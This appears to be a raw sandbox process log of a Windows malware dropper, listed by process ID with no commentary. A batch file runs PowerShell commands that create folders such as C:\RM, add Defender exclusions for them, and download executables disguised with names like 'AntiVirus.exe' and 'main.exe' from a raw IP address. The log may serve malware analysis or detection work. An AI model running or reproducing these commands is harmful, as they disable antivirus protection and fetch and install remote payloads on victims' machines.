cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lZMTYojgAYbtg" C:\Users\test22\AppData\Local\Temp\lamda.cmd
940powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\RM'"
2236powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\Programlog'"
2332powershell.exe powershell -Command "New-Item -ItemType Directory -Force -Path 'C:\Programlog1'"
2456powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\RM'"
2540powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Programlog'"
2628powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Programlog1'"
2772powershell.exe powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus.exe' -OutFile 'C:\RM\AntiVirus.exe'"
2856powershell.exe powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus2.exe' -OutFile 'C:\RM\AntiVirus2.exe'"
2936powershell.exe powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus3.exe' -OutFile 'C:\RM\AntiVirus3.exe'"
1648powershell.exe powershell -Command "Invoke-WebRequest 'http://45.88.91.103/LgGFdDAm/AntiVirus4.exe' -OutFile 'C:\RM\AntiVirus4.exe'"
2352powershell.exe Powershell -Command "Invoke-Webrequest 'http://45.88.91.103/LgGFdDAm/main.exe' -OutFile 'C:\Programlog\main.exe'"
2500powershell.exe Powershell -Command "Invoke-Webrequest 'http://45.88.91.103/LgGFdDAm/main2.exe' -OutFile 'C:\Programlog\main2.exe'"
2648